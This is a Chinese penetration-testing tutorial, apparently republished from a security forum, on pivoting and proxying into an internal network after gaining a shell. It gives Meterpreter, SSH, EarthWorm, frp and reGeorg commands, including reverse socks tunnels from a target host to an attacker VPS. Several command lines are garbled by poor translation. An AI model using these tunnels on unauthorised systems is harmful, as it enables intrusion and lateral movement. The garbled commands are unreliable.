作者: zjun
原文:https://xz.aliyun.com/t/8001
本文列举了我使用的内部网的代理方法,也加强了内部网的渗透代理态度,便于日后调查。
Meterpreter Meterpreter可以说是渗透中被广泛使用的工具,介绍内部网的目标外壳反弹后的两种代理方式。
portfwd portfwd用于传输单个端口,这是一个很好的方法,如果mydts具有很高的针对性,例如只需要目标上的3389个端口。
有关使用语法的详细信息,请参阅https://www.offensive-security.com/metasploit-unleashed/portfwd /
大致如下。
meterpreterportfwdaddl 7003p 3389r 192.168.52.138 # 传输-l :服务器接收端口-p :内部网主机必需的传输端口-r :目标内部网主机ipmeterpreterpreterportfwddelete-l 3389p 3389r 172.16.194.r meterpreter portfwd flush#删除所有传输端口。 socks代理socks代理只能在tcp级别上,不能对icmp、arp等进行代理。
msf包含三个内置的socks代理模块,分别为socks4a、socks5和socks_unc。 一般使用socks4a和socks5作为代理。 这两者只是根据支持的具体应用而不同。 socks4只支持TCP协议,但socks5支持TCP/UDP协议,还支持各种验证机制等协议。 这意味着您还必须设置用户名和密码才能在此处使用socks5。
向获取shell的计算机添加根
meterpreterrunget _ local _ subnetsmeterpreterrunautoroute-s 192.168.21.0/24 #额外路由meterpreter run autoroute -p#
首先用arp扫描内部网,可以大致生存机器的状况
meterpreterrunpost/windows/gather/ARP _ scanner rhosts=192.168.21.0/24
然后成立了socks4代理人,
meterpreterbackgroundmsf5exploit (multi/handler ) use auxiliary/server/socks 4a ms F5 auxiliary ) ) ) setsrvhost 127.0.0.1 ms F5 auxiliary (server/socks 4a ) setsrvport 1080 ms F5 auxiliary (server/socks 4a ) run
安装完成后,配置proxychains并成功
socks5模块也是如此,只是增加一个用户名和密码。
参考:
3359 blog.csdn.net/QQ _ 36119192/article/details/105872076
3359 klionsec.github.io/2016/09/25/MSF-socks 4a /
NATBypass NATBypass是一种类似于lcx的端口传输工具,称为golang版lcx,可以编译为linux或windows版。
具体原理是公共网络vps监听两个本地端口,内部网的目标主机建立一个端口转发。 例如,如果将本地3389转发到公共网络vps上的一个端口,则vps侦听的另一个端口相当于内部网上的主机3389。
公共网络vps
nb -listen 1997 2017内部网主机
n B- slave 127.0.0.133603389 x.x.x.x :1997 # x.x.x.x是公共网络vps的IP本机直接访问公共网络vps的2017端口
ssh隧道ssh可以进行端口转发或建立socks5隧道。
如果具有公共网络地址的主机利用ssh创建socks5隧道,则由公共网络主机创建socks5隧道很简单。
ssh -N -f -D 9070 x.x.x.x
然后编辑本地/etc/proxychains.conf文件。
代理成功:
浏览器配置代理:
想象一下,当公共网络主机贯通两个内部网时,您和目标主机属于不同的内部网,无法从外部直接连接。 不过,幸运的是,这两个内部网都可以访问公共网络(JumpHost ),所以请考虑在一个公共网络设备中创建两个内部网之间的隧道。
在目标主机上运行:
ssh -qTfNn -R 2222
:localhost:22 JumpHost现在登录公网主机执行:
ssh -p 2222 localhost达到的效果只是将目标主机的端口转发到了公网,但是并未实现socks代理,思考后,尝试了后都不成功,不知可行否,若有师傅告知非常感激!
参考:https://cherrot.com/tech/2017/01/08/ssh-tunneling-practice.html
Earthworm简称EW,官方项目已停止更新,可在fork地址下载。
详细使用语法见:http://rootkiter.com/EarthWorm/
EW功能很强大,提供“正向”、“反向”、“多级级联”等方式打通隧道,更适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 。下面介绍一种简单的反向代理方法。
公网vps执行
./ew_for_linux64 -s rcsocks -l 7010 -e 7011目标内网主机执行
.ew_for_Win.exe -s rssocks -d x.x.x.x -e 7011# windows./ew_for_linux64 -s rssocks -d x.x.x.x -e 7011# linux本地攻击机即可通过proxychains或者浏览器设置socks5代理至公网vps的7011端口即可。
注:无意间浏览该工具作者的博客发现了该工具的新版本,http://rootkiter.com/Termite/ 还没来得及测试使用,先分享一下。
frpfrp作为反向代理工具胜在稳定,但是其依赖配置文件,溯源容易。
项目地址:https://github.com/fatedier/frp
可用于端口映射或打通socks隧道,下面介绍socks隧道代理
公网vps主机frps.ini文件
[common]bind_port = 7000token = password启动frps
./frps -c ./frps.ini目标内网主机frpc.ini文件
[common]server_addr = x.x.x.xserver_port = 7000token = password[socks5]type = tcpremote_port = 7004plugin = socks5启动frpc
./frpc -c ./frpc.ini本地攻击机修改/etc/prxoychains.conf配置文件即可
socks5 x.x.x.x 7004 基于web服务的socks5隧道基于web服务的socks隧道使用方便,可用于突破网络限制。常用的工具有:reGeorg,reDuh,Tunna等。
使用方法都大致一样,上传对应网站语言的脚本文件到目标内网服务器,本地利用脚本连接建立socks5隧道即可。
比如reGeorg:
根据目标服务器解析语言,选择脚本上传到服务器端,访问显示Georg says, 'All seems fine',表示脚本运行正常。
本地攻击主机运行
python2 reGeorgSocksProxy.py -p 7001 -u http://url/tunnel.php监听7001端口,出现Georg says, 'All seems fine'字样表明运行正常。可结合prxoychains进行代理。
https://www.secshi.com
学安全,上secshi。安全师,可信赖的网络安全学习平台,以让每个白帽子高效获得可信赖的优质内容为使命。安全师汇聚网络安全技术、黑客技术、web安全攻防、代码审计、渗透测试、漏洞挖掘、白帽子教程,沉淀知识,分享经验!吸引、聚集了IT界中大量的领域专家,将高质量的内容透过人的节点来成规模地生产和分享。用户通过分享等交流方式建立信任和连接,打造和提升个人影响力,并发现、获得新机会。